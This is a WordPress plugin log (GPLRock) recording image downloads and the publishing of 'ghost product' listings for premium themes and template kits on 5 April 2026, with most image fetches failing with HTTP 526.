erup-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f5290b6b.webp [05-Apr-2026 14:00:08 UTC] GPLRock: Using pre-downloaded image for product erup-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f5290b6b.webp [05-Apr-2026 14:00:08 UTC] GPLRock: Ghost product published with image - Product ID: erup-business-elementor-template-kit [05-Apr-2026 14:00:09 UTC] GPLRock: Image downloaded successfully for product erudite-education-online-course-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b217652d.webp [05-Apr-2026 14:00:09 UTC] GPLRock: Using pre-downloaded image for product erudite-education-online-course-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b217652d.webp [05-Apr-2026 14:00:09 UTC] GPLRock: Ghost product published with image - Product ID: erudite-education-online-course-elementor-template-kit [05-Apr-2026 14:01:29 UTC] GPLRock: Image download failed for product logo-showcase-for-cornerstone (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:31 UTC] GPLRock: Image download failed for product logo-showcase-for-cornerstone (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logo-showcase-for-cornerstone-22043.webp for product logo-showcase-for-cornerstone after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:01:33 UTC] GPLRock: Image download failed for product logo-showcase-for-cornerstone (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:35 UTC] GPLRock: Image download failed for product logo-showcase-for-cornerstone (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logo-showcase-for-cornerstone-22043.webp for product logo-showcase-for-cornerstone after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:01:37 UTC] GPLRock WARNING: Image download failed for product logo-showcase-for-cornerstone. URL: https://meldwp.com/wp-content/uploads/logo-showcase-for-cornerstone-22043.webp [05-Apr-2026 14:01:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: logo-showcase-for-cornerstone [05-Apr-2026 14:01:37 UTC] GPLRock: Image download failed for product woocommerce-seo-toolkit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:39 UTC] GPLRock: Image download failed for product woocommerce-seo-toolkit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-seo-toolkit-21987.webp for product woocommerce-seo-toolkit after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:01:42 UTC] GPLRock: Image download failed for product woocommerce-seo-toolkit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:44 UTC] GPLRock: Image download failed for product woocommerce-seo-toolkit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-seo-toolkit-21987.webp for product woocommerce-seo-toolkit after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:01:46 UTC] GPLRock WARNING: Image download failed for product woocommerce-seo-toolkit. URL: https://meldwp.com/wp-content/uploads/woocommerce-seo-toolkit-21987.webp [05-Apr-2026 14:01:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-seo-toolkit [05-Apr-2026 14:01:46 UTC] GPLRock: Image download failed for product wpc-events-pauloreg-codecanyon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:48 UTC] GPLRock: Image download failed for product wpc-events-pauloreg-codecanyon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpc-events---pauloreg--codecanyon-5342.webp for product wpc-events-pauloreg-codecanyon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:01:50 UTC] GPLRock: Image download failed for product wpc-events-pauloreg-codecanyon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:52 UTC] GPLRock: Image download failed for product wpc-events-pauloreg-codecanyon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpc-events---pauloreg--codecanyon-5342.webp for product wpc-events-pauloreg-codecanyon after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:01:55 UTC] GPLRock WARNING: Image download failed for product wpc-events-pauloreg-codecanyon. URL: https://meldwp.com/wp-content/uploads/wpc-events---pauloreg--codecanyon-5342.webp [05-Apr-2026 14:01:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpc-events-pauloreg-codecanyon [05-Apr-2026 14:01:55 UTC] GPLRock: Image download failed for product blog-manager-module-for-cms-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:57 UTC] GPLRock: Image download failed for product blog-manager-module-for-cms-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:01:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blog-manager-module-for-cms-pro-14066.webp for product blog-manager-module-for-cms-pro after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:01:59 UTC] GPLRock: Image download failed for product blog-manager-module-for-cms-pro (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:01 UTC] GPLRock: Image download failed for product blog-manager-module-for-cms-pro (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blog-manager-module-for-cms-pro-14066.webp for product blog-manager-module-for-cms-pro after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:02:03 UTC] GPLRock WARNING: Image download failed for product blog-manager-module-for-cms-pro. URL: https://meldwp.com/wp-content/uploads/blog-manager-module-for-cms-pro-14066.webp [05-Apr-2026 14:02:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blog-manager-module-for-cms-pro [05-Apr-2026 14:02:04 UTC] GPLRock: Image download failed for product audio-player-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:06 UTC] GPLRock: Image download failed for product audio-player-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/audio-player-for-woocommerce-33359.webp for product audio-player-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:02:08 UTC] GPLRock: Image download failed for product audio-player-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:10 UTC] GPLRock: Image download failed for product audio-player-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/audio-player-for-woocommerce-33359.webp for product audio-player-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:02:12 UTC] GPLRock WARNING: Image download failed for product audio-player-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/audio-player-for-woocommerce-33359.webp [05-Apr-2026 14:02:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: audio-player-for-woocommerce [05-Apr-2026 14:02:12 UTC] GPLRock: Image download failed for product wcmarketplace-postcode-restriction (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:14 UTC] GPLRock: Image download failed for product wcmarketplace-postcode-restriction (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wcmarketplace-postcode-restriction-24917.webp for product wcmarketplace-postcode-restriction after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:02:17 UTC] GPLRock: Image download failed for product wcmarketplace-postcode-restriction (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:19 UTC] GPLRock: Image download failed for product wcmarketplace-postcode-restriction (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wcmarketplace-postcode-restriction-24917.webp for product wcmarketplace-postcode-restriction after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:02:21 UTC] GPLRock WARNING: Image download failed for product wcmarketplace-postcode-restriction. URL: https://meldwp.com/wp-content/uploads/wcmarketplace-postcode-restriction-24917.webp [05-Apr-2026 14:02:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wcmarketplace-postcode-restriction [05-Apr-2026 14:02:21 UTC] GPLRock: Image downloaded successfully for product woocommerce-partial-orders (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bdee92a6.webp [05-Apr-2026 14:02:21 UTC] GPLRock: Using pre-downloaded image for product woocommerce-partial-orders: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bdee92a6.webp [05-Apr-2026 14:02:21 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-partial-orders [05-Apr-2026 14:02:21 UTC] GPLRock: Image download failed for product advanced-file-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:23 UTC] GPLRock: Image download failed for product advanced-file-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-file-management-25638.webp for product advanced-file-management after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:02:25 UTC] GPLRock: Image download failed for product advanced-file-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:27 UTC] GPLRock: Image download failed for product advanced-file-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-file-management-25638.webp for product advanced-file-management after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:02:29 UTC] GPLRock WARNING: Image download failed for product advanced-file-management. URL: https://meldwp.com/wp-content/uploads/advanced-file-management-25638.webp [05-Apr-2026 14:02:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advanced-file-management [05-Apr-2026 14:02:30 UTC] GPLRock: Image download failed for product woocommerce-split-order-payments (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:32 UTC] GPLRock: Image download failed for product woocommerce-split-order-payments (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-split-order-payments-31947.webp for product woocommerce-split-order-payments after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:02:34 UTC] GPLRock: Image download failed for product woocommerce-split-order-payments (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:36 UTC] GPLRock: Image download failed for product woocommerce-split-order-payments (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:02:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-split-order-payments-31947.webp for product woocommerce-split-order-payments after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:02:38 UTC] GPLRock WARNING: Image download failed for product woocommerce-split-order-payments. URL: https://meldwp.com/wp-content/uploads/woocommerce-split-order-payments-31947.webp [05-Apr-2026 14:02:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-split-order-payments [05-Apr-2026 14:02:38 UTC] GPLRock: Image downloaded successfully for product zigaform-wordpress-form-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2671edf.webp [05-Apr-2026 14:02:38 UTC] GPLRock: Using pre-downloaded image for product zigaform-wordpress-form-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2671edf.webp [05-Apr-2026 14:02:38 UTC] GPLRock: Ghost product published with image - Product ID: zigaform-wordpress-form-builder [05-Apr-2026 14:02:56 UTC] GPLRock: Image downloaded successfully for product wedjoy-wedding-photography-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3ebe49f.webp [05-Apr-2026 14:02:56 UTC] GPLRock: Using pre-downloaded image for product wedjoy-wedding-photography-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3ebe49f.webp [05-Apr-2026 14:02:56 UTC] GPLRock: Ghost product published with image - Product ID: wedjoy-wedding-photography-elementor-template-kit [05-Apr-2026 14:02:57 UTC] GPLRock: Image downloaded successfully for product wecare-hospital-clinic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de66fe1e.webp [05-Apr-2026 14:02:57 UTC] GPLRock: Using pre-downloaded image for product wecare-hospital-clinic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de66fe1e.webp [05-Apr-2026 14:02:57 UTC] GPLRock: Ghost product published with image - Product ID: wecare-hospital-clinic-elementor-template-kit [05-Apr-2026 14:02:59 UTC] GPLRock: Image downloaded successfully for product vitpro-herbal-health-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-572a39b8.webp [05-Apr-2026 14:02:59 UTC] GPLRock: Using pre-downloaded image for product vitpro-herbal-health-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-572a39b8.webp [05-Apr-2026 14:02:59 UTC] GPLRock: Ghost product published with image - Product ID: vitpro-herbal-health-elementor-template-kit [05-Apr-2026 14:03:00 UTC] GPLRock: Image downloaded successfully for product vintina-lingerie-underwear-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-79eca4f0.jpg [05-Apr-2026 14:03:00 UTC] GPLRock: Using pre-downloaded image for product vintina-lingerie-underwear-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-79eca4f0.jpg [05-Apr-2026 14:03:00 UTC] GPLRock: Ghost product published with image - Product ID: vintina-lingerie-underwear-store-elementor-template-kit [05-Apr-2026 14:03:02 UTC] GPLRock: Image downloaded successfully for product vihara-ashram-oriental-buddhist-temple-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1bc43c50.webp [05-Apr-2026 14:03:02 UTC] GPLRock: Using pre-downloaded image for product vihara-ashram-oriental-buddhist-temple-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1bc43c50.webp [05-Apr-2026 14:03:02 UTC] GPLRock: Ghost product published with image - Product ID: vihara-ashram-oriental-buddhist-temple-elementor-template-kit [05-Apr-2026 14:03:04 UTC] GPLRock: Image downloaded successfully for product verbalizer-language-courses-learning-center-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe980af0.jpg [05-Apr-2026 14:03:04 UTC] GPLRock: Using pre-downloaded image for product verbalizer-language-courses-learning-center-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe980af0.jpg [05-Apr-2026 14:03:04 UTC] GPLRock: Ghost product published with image - Product ID: verbalizer-language-courses-learning-center-elementor-template-kit [05-Apr-2026 14:03:05 UTC] GPLRock: Image downloaded successfully for product vano-organic-food-agriculture-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8cd820ce.webp [05-Apr-2026 14:03:06 UTC] GPLRock: Using pre-downloaded image for product vano-organic-food-agriculture-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8cd820ce.webp [05-Apr-2026 14:03:06 UTC] GPLRock: Ghost product published with image - Product ID: vano-organic-food-agriculture-elementor-template-kit [05-Apr-2026 14:03:07 UTC] GPLRock: Image downloaded successfully for product uzino-startup-app-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f058081.webp [05-Apr-2026 14:03:07 UTC] GPLRock: Using pre-downloaded image for product uzino-startup-app-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f058081.webp [05-Apr-2026 14:03:07 UTC] GPLRock: Ghost product published with image - Product ID: uzino-startup-app-elementor-template-kit [05-Apr-2026 14:03:08 UTC] GPLRock: Image downloaded successfully for product unione-university-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bd0655c0.webp [05-Apr-2026 14:03:09 UTC] GPLRock: Using pre-downloaded image for product unione-university-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bd0655c0.webp [05-Apr-2026 14:03:09 UTC] GPLRock: Ghost product published with image - Product ID: unione-university-elementor-template-kit [05-Apr-2026 14:03:10 UTC] GPLRock: Image downloaded successfully for product truder-cctv-security-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9e0f0b61.webp [05-Apr-2026 14:03:10 UTC] GPLRock: Using pre-downloaded image for product truder-cctv-security-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9e0f0b61.webp [05-Apr-2026 14:03:10 UTC] GPLRock: Ghost product published with image - Product ID: truder-cctv-security-service-elementor-template-kit [05-Apr-2026 14:04:52 UTC] GPLRock: Image download failed for product seowp-digital-marketing-agency-and-seo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:04:54 UTC] GPLRock: Image download failed for product seowp-digital-marketing-agency-and-seo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:04:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seowp--digital-marketing-agency-and-seo-wordpress-theme-26092.webp for product seowp-digital-marketing-agency-and-seo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:04:56 UTC] GPLRock: Image download failed for product seowp-digital-marketing-agency-and-seo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:04:58 UTC] GPLRock: Image download failed for product seowp-digital-marketing-agency-and-seo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seowp--digital-marketing-agency-and-seo-wordpress-theme-26092.webp for product seowp-digital-marketing-agency-and-seo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:00 UTC] GPLRock WARNING: Image download failed for product seowp-digital-marketing-agency-and-seo-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/seowp--digital-marketing-agency-and-seo-wordpress-theme-26092.webp [05-Apr-2026 14:05:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: seowp-digital-marketing-agency-and-seo-wordpress-theme [05-Apr-2026 14:05:01 UTC] GPLRock: Image download failed for product koral-multi-concept-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:03 UTC] GPLRock: Image download failed for product koral-multi-concept-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/koral---multi-concept-wordpress-theme-29775.webp for product koral-multi-concept-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:05 UTC] GPLRock: Image download failed for product koral-multi-concept-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:07 UTC] GPLRock: Image download failed for product koral-multi-concept-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/koral---multi-concept-wordpress-theme-29775.webp for product koral-multi-concept-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:09 UTC] GPLRock WARNING: Image download failed for product koral-multi-concept-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/koral---multi-concept-wordpress-theme-29775.webp [05-Apr-2026 14:05:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: koral-multi-concept-wordpress-theme [05-Apr-2026 14:05:09 UTC] GPLRock: Image download failed for product halo-multipurpose-shopify-theme-os-20 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:11 UTC] GPLRock: Image download failed for product halo-multipurpose-shopify-theme-os-20 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/halo---multipurpose-shopify-theme-os-20-33483.webp for product halo-multipurpose-shopify-theme-os-20 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:14 UTC] GPLRock: Image download failed for product halo-multipurpose-shopify-theme-os-20 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:16 UTC] GPLRock: Image download failed for product halo-multipurpose-shopify-theme-os-20 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/halo---multipurpose-shopify-theme-os-20-33483.webp for product halo-multipurpose-shopify-theme-os-20 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:18 UTC] GPLRock WARNING: Image download failed for product halo-multipurpose-shopify-theme-os-20. URL: https://meldwp.com/wp-content/uploads/halo---multipurpose-shopify-theme-os-20-33483.webp [05-Apr-2026 14:05:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: halo-multipurpose-shopify-theme-os-20 [05-Apr-2026 14:05:18 UTC] GPLRock: Image download failed for product ume-furniture-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:20 UTC] GPLRock: Image download failed for product ume-furniture-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ume---furniture-store-wordpress-theme-7148.webp for product ume-furniture-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:22 UTC] GPLRock: Image download failed for product ume-furniture-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:25 UTC] GPLRock: Image download failed for product ume-furniture-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ume---furniture-store-wordpress-theme-7148.webp for product ume-furniture-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:27 UTC] GPLRock WARNING: Image download failed for product ume-furniture-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ume---furniture-store-wordpress-theme-7148.webp [05-Apr-2026 14:05:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ume-furniture-store-wordpress-theme [05-Apr-2026 14:05:27 UTC] GPLRock: Image download failed for product prospect-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:29 UTC] GPLRock: Image download failed for product prospect-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prospect---creative-multipurpose-wordpress-theme-19799.webp for product prospect-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:31 UTC] GPLRock: Image download failed for product prospect-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:33 UTC] GPLRock: Image download failed for product prospect-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/prospect---creative-multipurpose-wordpress-theme-19799.webp for product prospect-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:35 UTC] GPLRock WARNING: Image download failed for product prospect-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/prospect---creative-multipurpose-wordpress-theme-19799.webp [05-Apr-2026 14:05:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: prospect-creative-multipurpose-wordpress-theme [05-Apr-2026 14:05:36 UTC] GPLRock: Image download failed for product mental-art-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:38 UTC] GPLRock: Image download failed for product mental-art-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mental--art--portfolio-wordpress-theme-33623.webp for product mental-art-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:40 UTC] GPLRock: Image download failed for product mental-art-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:42 UTC] GPLRock: Image download failed for product mental-art-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mental--art--portfolio-wordpress-theme-33623.webp for product mental-art-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:44 UTC] GPLRock WARNING: Image download failed for product mental-art-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mental--art--portfolio-wordpress-theme-33623.webp [05-Apr-2026 14:05:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mental-art-portfolio-wordpress-theme [05-Apr-2026 14:05:44 UTC] GPLRock: Image download failed for product metro-email-template-for-mailster (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:46 UTC] GPLRock: Image download failed for product metro-email-template-for-mailster (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/metro---email-template-for-mailster-28759.webp for product metro-email-template-for-mailster after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:49 UTC] GPLRock: Image download failed for product metro-email-template-for-mailster (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:51 UTC] GPLRock: Image download failed for product metro-email-template-for-mailster (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/metro---email-template-for-mailster-28759.webp for product metro-email-template-for-mailster after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:53 UTC] GPLRock WARNING: Image download failed for product metro-email-template-for-mailster. URL: https://meldwp.com/wp-content/uploads/metro---email-template-for-mailster-28759.webp [05-Apr-2026 14:05:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: metro-email-template-for-mailster [05-Apr-2026 14:05:53 UTC] GPLRock: Image download failed for product musik-music-web-application-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:55 UTC] GPLRock: Image download failed for product musik-music-web-application-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:05:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musik---music-web-application-template-8660.webp for product musik-music-web-application-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:05:58 UTC] GPLRock: Image download failed for product musik-music-web-application-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:06:00 UTC] GPLRock: Image download failed for product musik-music-web-application-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 14:06:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musik---music-web-application-template-8660.webp for product musik-music-web-application-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 14:06:02 UTC] GPLRock WARNING: Image download failed for product musik-music-web-application-template. URL: https://meldwp.com/wp-content/uploads/musik---music-web-application-template-8660.webp [05-Apr-2026 14:06:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: musik-music-web-application-template 